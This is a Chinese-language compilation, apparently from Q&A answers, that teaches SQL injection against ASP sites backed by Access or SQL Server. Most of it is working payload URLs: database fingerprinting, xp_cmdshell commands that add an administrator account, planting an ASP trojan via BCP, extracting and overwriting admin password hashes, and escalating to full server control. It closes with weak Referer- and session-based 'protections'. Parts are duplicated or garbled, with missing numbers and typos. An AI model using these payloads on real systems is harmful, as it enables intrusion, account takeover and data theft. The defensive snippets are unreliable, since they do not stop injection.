①大小定混合法：由於VBS並不區分大小寫，而程序員在過濾時通常要麼全部過濾大寫字元串，要麼全部過濾小寫字元串，而大小寫混合往往會被忽視。如用SelecT代替select,SELECT等；

②UNICODE法：在IIS中，以UNICODE字元集實現國際化，我們完全可以IE中輸入的字元串化成UNICODE字元串進行輸入。如+ =%2B，空格=%20 等；URLEncode信息參見附件一；

③ASCII碼法：可以把輸入的部分或全部字元全部

<4>出了上述方法以外，還有個更簡單的方法就是使用現成的工具像NB聯盟的NBSI就是一款很不錯的工具，目前最新的版本為2.2

二、判斷資料庫類型

不同的資料庫的函數、注入方法都是有差異的，所以在注入之前，我們還要判斷一下資料庫的類型。一般ASP最常搭配的資料庫是Access和SQLServer，網上超過99%的網站都是其中之一。

怎麼讓程序告訴你它使用的什麼資料庫呢？來看看：

SQLServer有一些系統變數，如果伺服器IIS提示沒關閉，並且SQLServer返回錯誤提示的話，那可以直接從出錯信息獲取，方法如下：
http://www.163.com/news.asp?id=xx;and user>0

這句語句很簡單，但卻包含了SQLServer特有注入方法的精髓，我自己也是在一次無意的測試中發現這種效率極高的猜解方法。讓我看來看看它的含義：首先，前面的語句是正常的，重點在and user>0，我們知道，user是SQLServer的一個內置變數，它的值是當前連接的用戶名，類型為nvarchar。拿一個 nvarchar的值跟int的數0比較，系統會先試圖將nvarchar的值轉成int型，當然，轉的過程中肯定會出錯，SQLServer的出錯提示是：將nvarchar值 」abc」 轉換數據類型為 int 的列時發生語法錯誤，呵呵，abc正是變數user的值，這樣，不廢吹灰之力就拿到了資料庫的用戶名。在以後的篇幅里，大家會看到很多用這種方法的語句。 順便說幾句，眾所周知，SQLServer的用戶sa是個等同Adminstrators許可權的角色，拿到了sa許可權，幾乎肯定可以拿到主機的 Administrator了。上面的方法可以很方便的測試出是否是用sa登錄，要注意的是：如果是sa登錄，提示是將」dbo」轉換成int的列發生錯誤，而不是」sa」。

如果伺服器IIS不允許返回錯誤提示，那怎麼判斷資料庫類型呢？我們可以從Access和SQLServer和區別入手，Access和 SQLServer都有自己的系統表，比如存放資料庫中所有對象的表，Access是在系統表[msysobjects]中，但在Web環境下讀該表會提示「沒有許可權」，SQLServer是在表[sysobjects]中，在Web環境下可正常讀取。

在確認可以注入的情況下，使用下面的語句：

http://www.163.com/news.asp?id=xx ;and (select count(*) from sysobjects)>0
http://www.163.com/news.asp?id=xx ;and (select count(*) from msysobjects)>0

如果資料庫是SQLServer，那麼第一個網址的頁面與原頁面http://www.163.com/news.asp?id=xx是大致相同的；而第二個網址，由於找不到表msysobjects，會提示出錯，就算程序有容錯處理，頁面也與原頁面完全不同。

如果資料庫用的是Access，那麼情況就有所不同，第一個網址的頁面與原頁面完全不同；第二個網址，則視乎資料庫設置是否允許讀該系統表，一般來說是不允許的，所以與原網址也是完全不同。大多數情況下，用第一個網址就可以得知系統所用的資料庫類型，第二個網址只作為開啟IIS錯誤提示時的驗證。

三、確定XP_CMDSHELL可執行情況

若當前連接數據的帳號具有SA許可權，且master.dbo.xp_cmdshell擴展存儲過程(調用此存儲過程可以直接使用操作系統的shell)能夠正確執行，則整個計算機可以通過以下幾種方法完全控制，以後的所有步驟都可以省

1、http://www.163.com/news.asp?id=xx and user>;0 news.asp執行異常但可以得到當前連接資料庫的用戶名(若顯示dbo則代表SA)。

2、http://www.163.com/news.asp?id=xx and db_name()>0 news.asp執行異常但可以得到當前連接的資料庫名。

3、http://www.163.com/news.asp?id=xx；exec master..xp_cmdshell 「net user aaa bbb /add」-- (master是SQL-SERVER的主數據
庫；名中的分號表示SQL-SERVER執行完分號前的語句名，繼續執行其後面的語句；「—」號是註解，表示其後面的所有內容僅為注釋，系統並不執行)可以直接增加操作系統帳戶aaa,密碼為bbb。

4、http://www.163.com/news.asp?id=xx；exec master..xp_cmdshell 「net localgroup administrators aaa /add」-- 把剛剛增加
的帳戶aaa加到administrators組中。

5、http://www.163.com/news.asp?id=xx；backuup database 資料庫名 to disk='c:\inetpub\wwwroot\save.db' 則把得到的數據內容
全部備份到WEB目錄下，再用HTTP把此文件下載(當然首選要知道WEB虛擬目錄)。

6、通過復制CMD創建UNICODE漏洞

http://www.163.com/news.asp?id=xx;exec master.dbo.xp_cmdshell 「 c:\winnt\system32\cmd.exe

c:\inetpub\scripts\cmd.exe」 便製造了一個UNICODE漏洞，通過此漏洞的利用方法，便完成了對整個計算機的控制(當然首選要知道WEB虛擬目錄)。

這樣你就成功的完成了一次SQL注入攻擊，先別興奮，在實踐時你就會發現這比理論要難的多會有更多的困難等著你come over ，下面GO ON如果上述條件不成立則需繼續奮斗（要掛馬了：））

GO ON~!

當上述條件不成立時就要繼續下面的步驟

(一)、發現WEB虛擬目錄

只有找到WEB虛擬目錄，才能確定放置ASP木馬的位置，進而得到USER許可權。有兩種方法比較有效。

一是根據經驗猜解，一般來說，WEB虛擬目錄是：c:\inetpub\wwwroot;

D:\inetpub\wwwroot; E:\inetpub\wwwroot等，而可執行虛擬目錄是：
c:\inetpub\scripts; D:\inetpub\scripts; E:\inetpub\scripts等。

二是遍歷系統的目錄結構，分析結果並發現WEB虛擬目錄；

先創建一個臨時表：temp

http://www.163.com/news.asp?id=xx;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3
nvarchar(255));--

接下來：

1 我們可以利用xp_availablemedia來獲得當前所有驅動器,並存入temp表中：

http://www.163.com/news.asp?id=xx;insert temp exec master.dbo.xp_availablemedia;--

我們可以通過查詢temp的內容來獲得驅動器列表及相關信息

2 我們可以利用xp_subdirs獲得子目錄列表,並存入temp表中：

http://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--

3 我們還可以利用xp_dirtree獲得所有子目錄的目錄樹結構,並寸入temp表中：

http://www.163.com/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--

這樣就可以成功的瀏覽到所有的目錄（文件夾）列表：

如果我們需要查看某個文件的內容，可以通過執行xp_cmdsell：

http://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--

使用'bulk insert'語法可以將一個文本文件插入到一個臨時表中。如：bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp'
瀏覽temp就可以看到index.asp文件的內容了！通過分析各種ASP文件，可以得到大量系統信息，WEB建設與管理信息，甚至可以得到SA帳號的連接密碼。

當然，如果xp_cmshell能夠執行，我們可以用它來完成：

http://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--
http://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';--

通過xp_cmdshell我們可以看到所有想看到的，包括W3svc

http://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'cscript
C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc'

但是，如果不是SA許可權，我們還可以使用

http://www.163.com/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--

注意：

1、以上每完成一項瀏覽後，應刪除TEMP中的所有內容，刪除方法是：

http://www.163.com/news.asp?id=xx;delete from temp;--

2、瀏覽TEMP表的方法是：(假設TestDB是當前連接的資料庫名)
http://www.163.com/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp )>0

得到表TEMP中第一條記錄id欄位的值，並與整數進行比較，顯然news.asp工作異常，但在異常中卻可以發現id欄位的值。假設發現的表名是xyz，則

http://www.163.com/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp )>0 where id not in('xyz'))>0

得到表TEMP中第二條記錄id欄位的值。

(二)、上傳ASP木馬

所謂ASP木馬，就是一段有特殊功能的ASP代碼，並放入WEB虛擬目錄的Scripts下，遠程客戶通過IE就可執行它，進而得到系統的USER許可權，實現對系統的初步控制。上傳ASP木馬一般有兩種比較有效的方法：

1、利用WEB的遠程管理功能

許多WEB站點，為了維護的方便，都提供了遠程管理的功能；也有不少WEB站點，其內容是對於不同的用戶有不同的訪問許可權。為了達到對用戶許可權的控制，都有一個網頁，要求用戶名與密碼，只有輸入了正確的值，才能進行下一步的操作,可以實現對WEB的管理，如上傳、下載文件，目錄瀏覽、修改配置等。

因此，若獲取正確的用戶名與密碼，不僅可以上傳ASP木馬，有時甚至能夠直接得到USER許可權而瀏覽系統，上一步的「發現WEB虛擬目錄」的復雜操作都可省略。

用戶名及密碼一般存放在一張表中，發現這張表並讀取其中內容便解決了問題。以下給出兩種有效方法。

A、 注入法：

從理論上說，認證網頁中會有型如：

select * from admin where username='XXX' and password='YYY' 的語句，若在正式運行此句之前，沒有進行必要的字元過濾，則很容易實施SQL注入。

如在用戶名文本框內輸入：abc』 or 1=1-- 在密碼框內輸入：123 則SQL語句變成：

select * from admin where username='abc』 or 1=1 and password='123』

不管用戶輸入任何用戶名與密碼，此語句永遠都能正確執行，用戶輕易騙過系統，獲取合法身份。

B、猜解法：

基本思路是：猜解所有資料庫名稱，猜出庫中的每張表名，分析可能是存放用戶名與密碼的表名，猜出表中的每個欄位名，猜出表中的每條記錄內容。

a 猜解所有資料庫名稱

http://www.163.com/news.asp?id=xx and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) <>0

因為dbid的值從1到5，是系統用了。所以用戶自己建的一定是從6開始的。並且我們提交了 name>1 (name欄位是一個字元型的欄位和數字比較會出錯),news.asp工作異常，可得到第一個資料庫名，同理把DBID分別改成7,8，9,10,11,12…就可得到所有資料庫名。

以下假設得到的資料庫名是TestDB。

b 猜解資料庫中用戶名表的名稱

猜解法：此方法就是根據個人的經驗猜表名，一般來說，

user,users,member,members,userlist,memberlist,userinfo,manager,admin,adminuser,systemuser,
systemusers,sysuser,sysusers,sysaccounts,systemaccounts等。並通過語句進行判斷

http://www.163.com/news.asp?id=xx and (select count(*) from TestDB.dbo.表名)>0 若表名存在，則news.asp工作正常，否則異常。如此循環，直到猜到系統帳號表的名稱。

讀取法：SQL-SERVER有一個存放系統核心信息的表sysobjects，有關一個庫的所有表，視圖等信息全部存放在此表中，而且此表可以通過WEB進行訪問。

當xtype='U' and status>0代表是用戶建立的表，發現並分析每一個用戶建立的表及名稱，便可以得到用戶名表的名稱，基本的實現方法是：

①http://www.163.com/news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 )>0
得到第一個用戶建立表的名稱，並與整數進行比較，顯然news.asp工作異常，但在異常中卻可以發現表的名稱。假設發現的表名是xyz，則

②http://www.163.com/news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 and
name not in('xyz'))>0 可以得到第二個用戶建立的表的名稱，同理就可得到所有用建立的表的名稱。

根據表的名稱，一般可以認定那張表用戶存放用戶名及密碼，以下假設此表名為Admin。

c 猜解用戶名欄位及密碼欄位名稱

admin表中一定有一個用戶名欄位，也一定有一個密碼欄位，只有得到此兩個欄位的名稱，才有可能得到此兩欄位的內容。如何得到它們的名稱呢，同樣有以下兩種方法。

猜解法：此方法就是根據個人的經驗猜欄位名，一般來說，用戶名欄位的名稱常用：username,name,user,account等。而密碼欄位的名稱常用：password,pass,pwd,passwd等。並通過語句進行判斷

http://www.163.com/news.asp?id=xx and (select count(欄位名) from TestDB.dbo.admin)>0 「select count(欄位名) from 表名」

語句得到表的行數，所以若欄位名存在，則news.asp工作正常，否則異常。如此循環，直到猜到兩個欄位的名稱。

讀取法：基本的實現方法是

http://www.163.com/news.asp?id=xx and (select top 1 col_name(object_id('admin'),1) from TestDB.dbo.sysobjects)>0 。
select top 1 col_name(object_id('admin'),1) from TestDB.dbo.sysobjects是從sysobjects得到已知表名的第一個欄位名，當與整數進行比較，顯然news.asp工作異常，但在異常中卻可以發現欄位的名稱。把col_name(object_id('admin'),1)中的1依次換成2,3,4,5，6…就可得到所有的欄位名稱。

d 猜解用戶名與密碼

猜用戶名與密碼的內容最常用也是最有效的方法有：

ASCII碼逐字解碼法:雖然這種方法速度較慢，但肯定是可行的。基本的思路是先猜出欄位的長度，然後依次猜出每一位的值。猜用戶名與猜密碼的方法相同，以下以猜用戶名為例說明其過程。

http://www.163.com/news.asp?id=xx and (select top 1 len(username) from TestDB.dbo.admin)=X(X=1,2，3,4，5，… n，username

為用戶名欄位的名稱，admin為表的名稱)，若x為某一值i且news.asp運行正常時，則i就是第一個用戶名的長度。如：當輸入
http://www.163.com/news.asp?id=xx and (select top 1 len(username) from TestDB.dbo.admin)=8時news.asp運行正常，則第一個用戶名的長度為8

http://www.163.com/news.asp?id=xx and (select top 1 ascii(substring(username,m,1)) from TestDB.dbo.admin)=n (m的值在1到上一步得到的用戶名長度之間，當m=1，2,3，…時猜測分別猜測第1,2,3,…位的值；n的值是1~9、a~z、A~Z的ASCII值，也就是1~128之間的任意值；admin為系統用戶帳號表的名稱)，若n為某一值i且news.asp運行正常時，則i對應ASCII碼就是用戶名某一位值。如：當輸入
http://www.163.com/news.asp?id=xx and (select top 1 ascii(substring(username,3,1)) from TestDB.dbo.admin)=80時news.asp運行正常，則用戶名的第三位為P(P的ASCII為80)；http://www.163.com/news.asp?id=xx and (select top 1 ascii(substring(username,9,1)) from TestDB.dbo.admin)=33時news.asp運行正常，則用戶名的第9位為!(!的ASCII為80)；猜到第一個用戶名及密碼後，同理，可以猜出其他所有用戶名與密碼。注意：有時得到的密碼可能是經MD5等方式加密後的信息，還需要用專用工具進行脫密。或者先改其密碼，使用完後再改回來，見下面說明。簡單法：猜用戶名用http://www.163.com/news.asp?id=xx and (select top 1 flag from TestDB.dbo.admin where username>1) , flag是admin表中的一個欄位，username是用戶名欄位，此時news.asp工作異常，但能得到Username的值。與上同樣的方法，可以得到第二用戶名，第三個用戶等等，直到表中的所有用戶名。

猜用戶密碼：http://www.163.com/news.asp?id=xx and (select top 1 flag from TestDB.dbo.admin where pwd>1) , flag是admin表中的一個欄位，pwd是密碼欄位，此時news.asp工作異常，但能得到pwd的值。與上同樣的方法，可以得到第二用戶名的密碼，第三個用戶的密碼等等，直到表中的所有用戶的密碼。密碼有時是經MD5加密的，可以改密碼。

http://www.163.com/news.asp?id=xx;update TestDB.dbo.admin set pwd=' a0b923820dcc509a' where username='www';-- ( 1的MD5值為：AAABBBCCCDDDEEEF，即把密碼改成1；www為已知的用戶名)用同樣的方法當然可把密碼改原來的值。

2、利用表內容導成文件功能

SQL有BCP命令，它可以把表的內容導成文本文件並放到指定位置。利用這項功能，我們可以先建一張臨時表，然後在表中一行一行地輸入一個ASP木馬，然後用BCP命令導出形成ASP文件。

命令行格式如下：

bcp "select * from text..foo" queryout c:\inetpub\wwwroot\163.asp –c –S localhost –U sa –P foobar
('S'參數為執行查詢的伺服器，'U'參數為用戶名，'P'參數為密碼，最終上傳了一個163.asp的木馬)

3、利用工具，如NBSI給出的一些參考數據最重要的表名：

select * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses

最重要的一些用戶名（默認sql資料庫中存在著的）

public
dbo
guest(一般禁止，或者沒許可權)
db_sercurityadmin
ab_dlladmin
一些默認擴展
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_availablemedia 驅動器相關
xp_dirtree 目錄
xp_enumdsn ODBC連接
xp_loginconfig 伺服器安全模式信息
xp_makecab 創建壓縮卷
xp_ntsec_enumdomains domain信息
xp_terminate_process 終端進程，給出一個PID

(三)、得到系統的管理員許可權

ASP木馬只有USER許可權，要想獲取對系統的完全控制，還要有系統的管理員許可權。怎麼辦？提升許可權的方法有很多種：

上傳木馬，修改開機自動運行的.ini文件(它一重啟，便死定了)；

復制CMD.exe到scripts，人為製造UNICODE漏洞；

下載SAM文件，破解並獲取OS的所有用戶名密碼；

等等，視系統的具體情況而定，可以採取不同的方法。

那麼我們怎麼防注入呢？程序如下加入到asp或html或php或cgi裡面都可以。經過測試。加入如 top.asp文件中開頭

方法一：

<%if session("username"="" or session("userkey"="" then
response.redirect "../../"
end if%>

(說明：只要有用戶注入則跳轉到../../目錄，呵呵，看你怎麼給我注入)

方法二：

<%
server_v1=Cstr(Request.ServerVariables("HTTP_REFERER")
server_v2=Cstr(Request.ServerVariables("SERVER_NAME")
if mid(server_v1,8,len(server_v2))<>server_v2 then
response.write "<br><br><center><table border=1 cellpadding=20 bordercolor=black bgcolor=#EEEEEE width=450>"
response.write "<tr><td style=「font:9pt Verdana">"
response.write "你提交的路徑有誤，禁止從站點外部提交數據請不要亂該參數！"
response.write "</td></tr></table></center>"
response.end
end if
%>

(說明：只要有用戶注入則判斷為外部連接哦，呵呵，看你怎麼給我注入)

方法三：

<% dim From_url,Serv_url
From_url = Cstr(Request.ServerVariables("HTTP_REFERER")
Serv_url = Cstr(Request.ServerVariables("SERVER_NAME")
if mid(From_url,8,len(Serv_url)) <> Serv_url then
response.write "NO"
response.redirect("../"
response.end
end if%>

⑻ SQL注入步驟和常用函數以及中文處理方法

第一節 SQL注入的一般步驟 首先 判斷環境 尋找注入點 判斷資料庫類型 這在入門篇已經講過了 其次 根據注入參數類型 在腦海中重構SQL語句的原貌 按參數類型主要分為下面三種 (A)ID= 這類注入的參數是數字型 SQL語句原貌大致如下 Select * from 表名 where 欄位= 注入的參數為ID= And [查詢條件] 即是生成語句 Select * from 表名 where 欄位= And [查詢條件](B) Class=連續劇 這類注入的參數是字元型 SQL語句原貌大致概如下 Select * from 表名 where 欄位= 連續劇 注入的參數為Class=連續劇 and [查詢條件] and = 即是生成語句 Select * from 表名 where 欄位= 連續劇 and [查詢條件] and = (C) 搜索時沒過濾參數的 如keyword=關鍵字 SQL語句原貌大致如下 Select * from 表名 where 欄位like %關鍵字% 注入的參數為keyword= and [查詢條件] and % = 即是生成語句 Select * from 表名 where欄位like % and [查詢條件] and % = % 接著 將查詢條件替換成SQL語句 猜解表名 例如 ID= And (Select Count(*) from Admin)>= 如果頁面就與ID= 的相同 說明附加條件成立 即表Admin存在 反之 即不存在（請牢記這種方法） 如此循環 直至猜到表名為止 表名猜出來後 將Count(*)替換成Count(欄位名) 用同樣的原理猜解欄位名 有人會說 這里有一些偶然的成分 如果表名起得很復雜沒規律的 那根本就沒得玩下去了 說得很對 這世界根本就不存在 %成功的黑客技術 蒼蠅不叮無縫的蛋 無論多技術多高深的黑客 都是因為別人的程序寫得不嚴密或使用者保密意識不夠 才有得下手 有點跑題了 話說回來 對於SQLServer的庫 還是有辦法讓程序告訴我們表名及欄位名的 我們在高級篇中會做介紹 最後 在表名和列名猜解成功後 再使用SQL語句 得出欄位的值 下面介紹一種最常用的方法－Ascii逐字解碼法 雖然這種方法速度很慢 但肯定是可行的方法 我們舉個例子 已知表Admin中存在username欄位 首先 我們取第一條記錄 測試長度 ?id= and (select top len(username) from Admin)> 先說明原理 如果top 的username長度大於 則條件成立 接著就是> > > 這樣測試下去 一直到條件不成立為止 比如> 成立 > 不成立 就是len(username)= 當然沒人會笨得從 一個個測試 怎麼樣才比較快就看各自發揮了 在得到username的長度後 用mid(username N )截取第N位字元 再asc(mid(username N ))得到ASCII碼 比如 id= and (select top asc(mid(username )) from Admin)> 同樣也是用逐步縮小范圍的方法得到第 位字元的ASCII碼 注意的是英文和數字的ASCII碼在 之間 可以用折半法加速猜解 如果寫成程序測試 效率會有極大的提高 第二節 SQL注入常用函數 有SQL語言基礎的人 在SQL注入的時候成功率比不熟悉的人高很多 我們有必要提高一下自己的SQL水平 特別是一些常用的函數及命令 Access asc(字元)SQLServer unicode(字元)作用 返回某字元的ASCII碼Access chr(數字)SQLServer nchar(數字)作用 與asc相反 根據ASCII碼返回字元Access mid(字元串 N L)SQLServer substring(字元串 N L)作用 返回字元串從N個字元起長度為L的子字元串 即N到N+L之間的字元串Access abc(數字)SQLServer abc (數字)作用 返回數字的絕對值（在猜解漢字的時候會用到）Access A beeen B And CSQLServer A beeen B And C作用 判斷A是否界於B與C之間 第三節 中文處理方法 在注入中碰到中文字元是常有的事 有些人一碰到中文字元就想打退堂鼓了 其實只要對中文的編碼有所了解 中文恐懼症 很快可以克服 先說一點常識 Access中 中文的ASCII碼可能會出現負數 取出該負數後用abs()取絕對值 漢字字元不變 SQLServer中 中文的ASCII為正數 但由於是UNICODE的雙位編碼 不能用函數ascii()取得ASCII碼 必須用函數unicode ()返回unicode值 再用nchar函數取得對應的中文字元 了解了上面的兩點後 是不是覺得中文猜解其實也跟英文差不多呢？除了使用的函數要注意 猜解范圍大一點外 方法是沒什麼兩樣的 lishixin/Article/program/SQLServer/201311/22039

⑼ 什麼是sql 注入，如何實現注入

找了一個，希望能幫助你
隨著B/S模式應用開發的發展，使用這種模式編寫應用程序的程序員也越來越多。但是由於這個行業的入門門檻不高，程序員的水平及經驗也參差不齊，相當大一部分程序員在編寫代碼的時候，沒有對用戶輸入數據的合法性進行判斷，使應用程序存在安全隱患。用戶可以提交一段資料庫查詢代碼，根據程序返回的結果，獲得某些他想得知的數據，這就是所謂的SQL Injection，即SQL注入。

SQL注入是從正常的WWW埠訪問，而且表面看起來跟一般的Web頁面訪問沒什麼區別，所以目前市面的防火牆都不會對SQL注入發出警報

，如果管理員沒查看IIS日誌的習慣，可能被入侵很長時間都不會發覺。

但是，SQL注入的手法相當靈活，在注入的時候會碰到很多意外的情況。能不能根據具體情況進行分析，構造巧妙的SQL語句，從而成功獲取想要的數據，是高手與「菜鳥」的根本區別。

根據國情，國內的網站用ASP+Access或SQLServer的佔70%以上，PHP+MySQ佔L20%，其他的不足10%。在本文，我們從分入門、進階至高級講解一下ASP注入的方法及技巧，PHP注入的文章由NB聯盟的另一位朋友zwell撰寫，希望對安全工作者和程序員都有用處。了解 ASP注入的朋友也請不要跳過入門篇，因為部分人對注入的基本判斷方法還存在誤區。大家准備好了嗎？Let's Go...

入門篇

如果你以前沒試過SQL注入的話，那麼第一步先把IE菜單=>工具=>Internet選項=>高級=>顯示友好 HTTP 錯誤信息前面的勾去掉。否則，不論伺服器返回什麼錯誤，IE都只顯示為HTTP 500伺服器錯誤，不能獲得更多的提示信息。

第一節、SQL注入原理

以下我們從一個網站www.mytest.com開始（註：本文發表前已徵得該站站長同意，大部分都是真實數據）。

在網站首頁上，有名為「IE不能打開新窗口的多種解決方法」的鏈接，地址為：http://www.mytest.com/showdetail.asp?id=49，我們在這個地址後面加上單引號』，伺服器會返回下面的錯誤提示：

Microsoft JET Database Engine 錯誤 '80040e14'

字元串的語法錯誤 在查詢表達式 'ID=49'' 中。

/showdetail.asp，行8

從這個錯誤提示我們能看出下面幾點：

1. 網站使用的是Access資料庫，通過JET引擎連接資料庫，而不是通過ODBC。

2. 程序沒有判斷客戶端提交的數據是否符合程序要求。

3. 該SQL語句所查詢的表中有一名為ID的欄位。

從上面的例子我們可以知道，SQL注入的原理，就是從客戶端提交特殊的代碼，從而收集程序及伺服器的信息，從而獲取你想到得到的資料。

第二節、判斷能否進行SQL注入

看完第一節，有一些人會覺得：我也是經常這樣測試能否注入的，這不是很簡單嗎？

其實，這並不是最好的方法，為什麼呢？

首先，不一定每台伺服器的IIS都返回具體錯誤提示給客戶端，如果程序中加了cint(參數)之類語句的話，SQL注入是不會成功的，但伺服器同樣會報錯，具體提示信息為處理 URL 時伺服器上出錯。請和系統管理員聯絡。

其次，部分對SQL注入有一點了解的程序員，認為只

要把單引號過濾掉就安全了，這種情況不為少數，如果你用單引號測試，是測不到注入點的

那麼，什麼樣的測試方法才是比較准確呢？答案如下：

① http://www.mytest.com/showdetail.asp?id=49

② http://www.mytest.com/showdetail.asp?id=49 ;and 1=1

③ http://www.mytest.com/showdetail.asp?id=49 ;and 1=2

這就是經典的1=1、1=2測試法了，怎麼判斷呢？看看上面三個網址返回的結果就知道了：

可以注入的表現：

① 正常顯示（這是必然的，不然就是程序有錯誤了）

② 正常顯示，內容基本與①相同

③ 提示BOF或EOF（程序沒做任何判斷時）、或提示找不到記錄（判斷了rs.eof時）、或顯示內容為空（程序加了on error resume next）

不可以注入就比較容易判斷了，①同樣正常顯示，②和③一般都會有程序定義的錯誤提示，或提示類型轉換時出錯。

當然，這只是傳入參數是數字型的時候用的判斷方法，實際應用的時候會有字元型和搜索型參數，我將在中級篇的「SQL注入一般步驟」再做分析。

第三節、判斷資料庫類型及注入方法

不同的資料庫的函數、注入方法都是有差異的，所以在注入之前，我們還要判斷一下資料庫的類型。一般ASP最常搭配的資料庫是Access和SQLServer，網上超過99%的網站都是其中之一。

怎麼讓程序告訴你它使用的什麼資料庫呢？來看看：

SQLServer有一些系統變數，如果伺服器IIS提示沒關閉，並且SQLServer返回錯誤提示的話，那可以直接從出錯信息獲取，方法如下：

http://www.mytest.com/showdetail.asp?id=49 ;and user>0

這句語句很簡單，但卻包含了SQLServer特有注入方法的精髓，我自己也是在一次無意的測試中發現這種效率極高的猜解方法。讓我看來看看它的含義：首先，前面的語句是正常的，重點在and user>0，我們知道，user是SQLServer的一個內置變數，它的值是當前連接的用戶名，類型為nvarchar。拿一個 nvarchar的值跟int的數0比較，系統會先試圖將nvarchar的值轉成int型，當然，轉的過程中肯定會出錯，SQLServer的出錯提示是：將nvarch

ar值 」abc」 轉換數據類型為 int 的列時發生語法錯誤，呵呵，abc正是變數user的值，這樣，不廢吹灰之力就拿到了資料庫的用戶名。在以後的篇幅里，大家會看到很多用這種方法的語句。

順便說幾句，眾所周知，SQLServer的用戶sa是個等同Adminstrators許可權的角色，拿到了sa許可權，幾乎肯定可以拿到主機的 Administrator了。上面的方法可以很方便的測試出是否是用sa登錄，要注意的是：如果是sa登錄，提示是將」dbo」轉換成int的列發生錯誤，而不是」sa」。

如果伺服器IIS不允許返回錯誤提示，那怎麼判斷資料庫類型呢？我們可以從Access和SQLServer和區別入手，Access和 SQLServer都有自己的系統表，比如存放資料庫中所有對象的表，Access是在系統表[msysobjects]中，但在Web環境下讀該表會提示「沒有許可權」，SQLServer是在表[sysobjects]中，在Web環境下可正常讀取。

在確認可以注入的情況下，使用下面的語句：

http://www.mytest.com/showdetail.asp?id=49 ;and (select count(*) from sysobjects)>0

http://www.mytest.com/showdetail.asp?id=49 ;and (select count(*) from msysobjects)>0

如果資料庫是SQLServer，那麼第一個網址的頁面與原頁面http://www.mytest.com/showdetail.asp?id= 49是大致相同的；而第二個網址，由於找不到表msysobjects，會提示出錯，就算程序有容錯處理，頁面也與原頁面完全不同。

如果資料庫用的是Access，那麼情況就有所不同，第一個網址的頁面與原頁面完全不同；第二個網址，則視乎資料庫設置是否允許讀該系統表，一般來說是不允許的，所以與原網址也是完全不同。大多數情況下，用第一個網址就可以得知系統所用的資料庫類型，第二個網址只作為開啟IIS錯誤提示時的驗證。

進階篇

在入門篇，我們學會了SQL注入的判斷方法，但真正要拿到網站的保密內容，是遠遠不夠的。接下來，我們就繼續學習如何從資料庫中獲取想要獲得的內容，首先，我們先看看SQL注入的一般步驟：

第一節、SQL注入的一般步驟

首先，判斷環境，尋找注入點，判斷資料庫類型，這在入門篇已經講過了。

其次，根據注入參數類型，在腦海中重構SQL語句的原貌，按參數類型主要分為下面三種：

(A) ID=49 這類注入的參

數是數字型，SQL語句原貌大致如下：

Select * from 表名 where 欄位=49

注入的參數為ID=49 And [查詢條件]，即是生成語句：

Select * from 表名 where 欄位=49 And [查詢條件]

(B) Class=連續劇 這類注入的參數是字元型，SQL語句原貌大致概如下：

Select * from 表名 where 欄位=』連續劇』

注入的參數為Class=連續劇』 and [查詢條件] and 『』=』 ，即是生成語句：

Select * from 表名 where 欄位=』連續劇』 and [查詢條件] and 『』=』』

&; 搜索時沒過濾參數的，如keyword=關鍵字，SQL語句原貌大致如下：

Select * from 表名 where 欄位like 』%關鍵字%』

注入的參數為keyword=』 and [查詢條件] and 『%25』=』， 即是生成語句：

Select * from 表名 where欄位like 』%』 and [查詢條件] and 『%』=』%』

接著，將查詢條件替換成SQL語句，猜解表名，例如：

ID=49 And (Select Count(*) from Admin)>=0

如果頁面就與ID=49的相同，說明附加條件成立，即表Admin存在，反之，即不存在（請牢記這種方法）。如此循環，直至猜到表名為止。

表名猜出來後，將Count(*)替換成Count(欄位名)，用同樣的原理猜解欄位名。

有人會說：這里有一些偶然的成分，如果表名起得很復雜沒規律的，那根本就沒得玩下去了。說得很對，這世界根本就不存在100%成功的黑客技術，蒼蠅不叮無縫的蛋，無論多技術多高深的黑客，都是因為別人的程序寫得不嚴密或使用者保密意識不夠，才有得下手。

有點跑題了，話說回來，對於SQLServer的庫，還是有辦法讓程序告訴我們表名及欄位名的，我們在高級篇中會做介紹。

最後，在表名和列名猜解成功後，再使用SQL語句，得出欄位的值，下面介紹一種最常用的方法－Ascii逐字解碼法，雖然這種方法速度很慢，但肯定是可行的方法。

我們舉個例子，已知表Admin中存在username欄位，首先，我們取第一條記錄，測試長度：

http://www.mytest.com/showdetail.asp?id=49 ;and (select top 1 len(username) from Admin)>0

先說明原理：如果top 1的username長度大於0，則條件成立；接著就是>1、>2、>3這樣測試下去，一直到條件不成立為止，比如>7成立，>8不成立，就是len(username)=8

當然沒人會笨得從0,1,2,3一個個測試，怎麼樣才比較快就看各自發揮了。在得到username的長度後，用mid(username,N,1)截取第N位字元，再asc(mid(username,N,1))得到ASCII碼，比如：

id=49 and (select top 1 asc(mid(username,1,1)) from Admin)>0

同樣也是用逐步縮小范圍的方法得到第1位字元的ASCII碼，注意的是英文和數字的ASCII碼在1-128之間，可以用折半法加速猜解，如果寫成程序測試，效率會有極大的提高。

第二節、SQL注入常用函數

有SQL語言基礎的人，在SQL注入的時候成功率比不熟悉的人高很多。我們有必要提高一下自己的SQL水平，特別是一些常用的函數及命令。

Access：asc(字元) SQLServer：unicode(字元)

作用：返回某字元的ASCII碼

Access：chr(數字) SQLServer：nchar(數字)

